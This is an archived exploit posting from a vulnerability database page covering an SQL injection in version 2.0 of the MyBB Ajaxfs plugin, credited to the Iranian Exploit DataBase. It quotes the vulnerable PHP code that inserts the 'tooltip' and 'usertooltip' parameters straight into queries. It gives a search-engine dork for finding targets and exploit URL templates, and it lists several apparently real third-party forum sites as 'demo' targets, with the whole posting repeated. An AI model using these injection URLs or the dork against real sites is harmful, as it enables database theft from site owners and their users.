Lucene search

SecurityvulnsSECURITYVULNS:DOC:30078

HistoryDec 09, 2013 - 12:00 a.m.

Mybb Ajaxfs Plugin Sql Injection vulnerability

2013-12-0900:00:00

vulners.com

JSON

a Sql Injection vulnerability In Mybb Ajaxfs Plugin Version 2.0

#################################

@@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@

@@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@

@@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@

@@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@

@@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@

@@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@

@@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@

#####################################

Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability

Author : Iranian Exploit DataBase

Discovered By : IeDb

Email : [email protected] - [email protected]

Home : http://iedb.ir - http://iedb.ir/acc

Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538

Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2

Security Risk : High

Tested on : Linux

Dork : inurl:ajaxfs.php

#################################

if(isset($_GET['tooltip']))
{
$pid=$_GET['tooltip'];
$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");

if(isset($_GET['usertooltip']))
{
$uid=$_GET['usertooltip'];
$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");

http://localhost/Upload/ajaxfs.php?usertooltip=1'

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;&#39;&#39;&#39;&#39; at line 1

Google DORK : inurl:ajaxfs.php

Exploit :

http://site.com/mybb/ajaxfs.php?tooltip=[sql]

http://site.com/mybb/ajaxfs.php?usertooltip=[sql]

Dem0 :

http://www.forum.birahy.com/ajaxfs.php?tooltip=mostreffer'

http://www.tamishe.ir/ajaxfs.php?tooltip=mostreffer'

http://www.opencartvn.com/forum/ajaxfs.php?tooltip=mostreffer'

http://freenimbuzz.takbb.com/_mybb_/ajaxfs.php?tooltip='

http://dvlottery.us/ajaxfs.php?tooltip=13349'

http://www.taltallon.com/forum/ajaxfs.php?tooltip=mostreffer'

#################################

Tnx To : All Member In Iedb.ir/acc & Iranian Hackers

#################################

Exploit Archive = http://www.iedb.ir/exploits-889.html

#################################

JSON

Mybb Ajaxfs Plugin Sql Injection vulnerability

@@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@

@@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@

@@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@

@@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@

@@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@

@@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@

@@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@

@@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@

@@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@

Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability

Author : Iranian Exploit DataBase

Discovered By : IeDb

Email : [email protected] - [email protected]

Home : http://iedb.ir - http://iedb.ir/acc

Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538

Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2

Security Risk : High

Tested on : Linux

Dork : inurl:ajaxfs.php

Exploit :

http://site.com/mybb/ajaxfs.php?tooltip=[sql]

http://site.com/mybb/ajaxfs.php?usertooltip=[sql]

Dem0 :

http://www.forum.birahy.com/ajaxfs.php?tooltip=mostreffer&#39;

http://www.tamishe.ir/ajaxfs.php?tooltip=mostreffer&#39;

http://www.opencartvn.com/forum/ajaxfs.php?tooltip=mostreffer&#39;

http://freenimbuzz.takbb.com/_mybb_/ajaxfs.php?tooltip=&#39;

http://dvlottery.us/ajaxfs.php?tooltip=13349&#39;

http://www.taltallon.com/forum/ajaxfs.php?tooltip=mostreffer&#39;

Tnx To : All Member In Iedb.ir/acc & Iranian Hackers

Exploit Archive = http://www.iedb.ir/exploits-889.html

http://www.forum.birahy.com/ajaxfs.php?tooltip=mostreffer'

http://www.tamishe.ir/ajaxfs.php?tooltip=mostreffer'

http://www.opencartvn.com/forum/ajaxfs.php?tooltip=mostreffer'

http://freenimbuzz.takbb.com/_mybb_/ajaxfs.php?tooltip='

http://dvlottery.us/ajaxfs.php?tooltip=13349'

http://www.taltallon.com/forum/ajaxfs.php?tooltip=mostreffer'